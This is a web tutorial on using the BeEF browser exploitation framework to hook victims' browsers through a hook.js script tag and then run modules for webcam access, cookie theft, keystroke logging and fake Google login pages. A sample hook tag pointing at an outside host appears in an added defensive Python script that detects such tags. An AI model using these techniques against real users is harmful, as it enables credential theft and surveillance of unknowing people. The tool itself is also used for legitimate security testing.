
Hack web browsers with BeEF to manage webcams, phish for credentials and more « Null Byte :: WonderHowTo



People use browsers for all kinds of things and we generally entrust a lot of personal information to them. Therefore, browsers are a perfect attack surface for a hacker, because the target may not even know they are infected and will give you all the information you want.

To do this, you must first trick the user into clicking a link. To generate the link, you can use a tool called BeEF that was pre-installed on Kali Linux.

Like Metasploit, BeEF, which stands for Browser Exploitation Framework, is a framework for launching attacks. Unlike Metasploit, it is specific for launching attacks on web browsers. In some cases, we could use BeEF in combination with Metasploit to launch more advanced attack scenarios.

The tool was developed by a group of developers led by Wade Alcorn. Built on the well-known Ruby on Rails platform, BeEF is designed to investigate and test vulnerabilities in browsers. Notably, BeEF is an excellent platform for testing a browser's vulnerability to cross-site scripting (XSS) and other injection attacks.

BeEF can generate a link that can track the target and even run modules to both escalate permissions and gather more information about the person behind the computer. It can even scan the network the person is on, which is quite impressive, and it lets you take photos with their webcam, see what they are typing and open phishing pages to get credentials.

Step 1: Install BeEF

BeEF is built directly into Kali Linux 2019.2 and older, so you don't need to install anything if you use one of those versions on your computer.

In mid-2019, Kali removed BeEF as a preinstalled exploitation tool, moving it from "kali-linux-default" to the "kali-linux-large" meta package. That means that if you install a new version of Kali, you would no longer have BeEF, but you could keep it if you just update your older version of Kali to 2019.3 or higher.

If you already have it, use the following command to update everything. And if you don't have it, the same command will install it. Make sure to use beef-xss and not "beef" because the latter is a programming language interpreter, which is different. (We made that mistake in our video above, so don't do the same thing.)

  ~ $ sudo apt install beef-xss 

Whether you installed it beforehand or had to install it, the rest is the same.

Step 2: Open the BeEF service

Once BeEF is installed, you can find it under Applications -> System Services and then click on "beef start". A terminal window will open to start the service.

If you don't see any beef-related tools in that folder, or if you don't see that folder at all, you may have "beef" and not "beef-xss" installed, so make sure you install the latter. (You can also start BeEF from the Exploitation Tools folder where the "beef xss framework" is.)

> Run "sudo beef-xss"
[sudo] password for kali:

[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Type a new password for the beef user:

[*] Wait for the BeEF service to start.
[*]
[*] You may need to refresh your browser once it is opened.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://:3000/hook.js">
[*] Example:

● beef-xss.service - LSB: BeEF
   Loaded: loaded (/etc/init.d/beef-xss; generated)
   Active: active (running) since Fri 2020-05-08 12:51:38 EDT; 5s ago
     Docs: man:systemd-sysv-generator(8)
  Process: 1432 ExecStart=/etc/init.d/beef-xss start (code=exited, status=0/SUCCESS)
    Tasks: 10 (limit: 6715)
   Memory: 140.8M
   CGroup: /system.slice/beef-xss.service
           └─1438 ruby /usr/share/beef-xss/beef

May 08 12:51:42 kali beef[1]: Starting LSB: BeEF...
May 08 12:51:42 kali beef[1]: Started LSB: BeEF.

[*] Open Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

If your browser does not open and load the page automatically, you can work around the problem by opening your favorite web browser, such as Firefox or Chrome, and going to the following URL, which is for the localhost (127.0.0.1) web server on port 3000.

  http://127.0.0.1:3000/ui/panel

Step 3: Log in to the BeEF service

Once the browser interface opens, you must log in to the BeEF service. The default credentials are beef for the username and beef for the password. However, you may be asked to create a password for your beef session (as seen above), in which case you would use beef as the username and whatever password you chose.

After successful login you should see the "Getting Started" page with information on how BeEF works. On the left is the column Hooked Browsers where all browsers you manage end up.

Step 4: Hook the Target Browser

The key to success with BeEF is "hooking" a browser. This basically means that we need the target to visit a vulnerable web app that includes the "hook.js" JavaScript file. To practice, BeEF provides a web page on your localhost with the payload in it, so visit it to see how it works.

  http://127.0.0.1:3000/demos/basic.html 

The code injected into the hooked browser responds to commands from the BeEF server that we manage. From there, we can do a lot of naughty things on the target's computer.
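From the defender's side, the hook is just an external script tag, so pages you serve can be audited for it. The following added example (not from the original article or the BeEF project) flags `<script src>` values that match the default hook URL shown in the startup output above, or that load from a host outside an allowlist; the hostnames, allowlist and sample HTML are assumptions constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdn.shop.example"}  # assumption: your own allowlist
BEEF_DEFAULT_PORT = 3000     # taken from the BeEF startup output on this page
BEEF_HOOK_FILE = "hook.js"   # taken from the BeEF startup output on this page


class ScriptAudit(HTMLParser):
    """Collect (severity, url, reason) findings for every external <script src>."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names, so <SCRIPT SRC=...> is caught.
        if tag != "script":
            return
        src = (dict(attrs).get("src") or "").strip()
        if not src:
            return  # inline script: out of scope for this check
        url = urlsplit(urljoin(self.page_url, src))  # resolves relative and //host forms
        host = (url.hostname or "").lower()
        name = url.path.rsplit("/", 1)[-1].lower()
        if name == BEEF_HOOK_FILE and url.port == BEEF_DEFAULT_PORT:
            self.findings.append(("high", url.geturl(), "default BeEF hook URL"))
        elif host not in ALLOWED_SCRIPT_HOSTS:
            self.findings.append(("medium", url.geturl(), "script from unapproved origin"))


def audit_page(page_url, html):
    """Return the findings for one page of HTML served at page_url."""
    parser = ScriptAudit(page_url)
    parser.feed(html)
    return parser.findings


# Constructed sample: a comment field where an injected hook tag was stored.
SAMPLE = """
<html><body>
<script src="/static/app.js"></script>
<script src="https://cdn.shop.example/lib.js"></script>
<div class="comment"><SCRIPT SRC="//203.0.113.7:3000/hook.js"></script></div>
<script src="https://tracker.invalid/t.js"></script>
</body></html>
"""

if __name__ == "__main__":
    for severity, url, reason in audit_page("https://shop.example/item/1", SAMPLE):
        print(f"{severity:6} {reason}: {url}")
```

The file name and port are only defaults, so the allowlist rule is the durable one. The same allowlist enforced as a Content-Security-Policy `script-src` directive stops the browser from loading an injected tag in the first place.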

Step 5: View the Browser Data

I have some hooked browsers, but I'm going to look at the Chrome browser. Click on your hooked browser and you will be taken to the "Details" tab, which provides information about the hooked browser. Mine appears as Chrome in the values.

This tab will show you much more than that. I see that the platform is Linux x86_64; that it has the Chrome PDF Plugin, Chrome PDF Viewer and Native Client plugins; the components include webgl, webrtc and websocket; and other interesting information.

Step 6: Run commands in the browser

Now that we have hooked the target's browser, we can run some of the built-in modules from the "Commands" tab.

There are over 300 modules, from browser hacks to social engineering, including, but by no means limited to:

  • Retrieve domains visited (browser)
  • Retrieve visited URLs (browser)
  • Webcam (browser)
  • Retrieve all cookies (extension)
  • Grab Google contacts (extension)
  • Screenshot (extension)
  • Steal Autocomplete (social engineering)
  • Google Phishing (social engineering)

When you find a module you want to use, select it and then click "Run" below the description. For example, I'm going to use the "Google Phishing" module in the "Social Engineering" folder.

After running it, a fake Gmail login page appears in the hooked browser. The user may not think twice about entering their username and password, and once they do, we log it. Then they are sent back to the Google site as if they had logged in normally.

To find the username and password we logged, click the command in the "Module Results History" column. For me, I see "hfhfhf" as a user and "sdliasdflihasdflh" as a password. You can also view this information in the "Logs" tab.

If we wanted, we could change the URL that the Google Phishing module uses, if you want to use something more credible than the old Gmail interface.

Once we hook the browser, there are almost unlimited possibilities for what we can do. You can even use BeEF for operating system attacks. Watch our Cyber Weapons Lab video above for more examples of what BeEF can help you achieve, such as accessing the webcam and tracking keystrokes.

BeEF is a powerful web browser attack tool

BeEF is an extraordinary and powerful tool for exploiting web browsers, and it is a terrifying example of why you should never click on suspicious links. Even if everything looks good, you have to be very careful with anything that pops up in your browser asking for permission to access your webcam or audio, or asking you to enter account information.


Cover photo and screenshots by Justin Meyers / Null Byte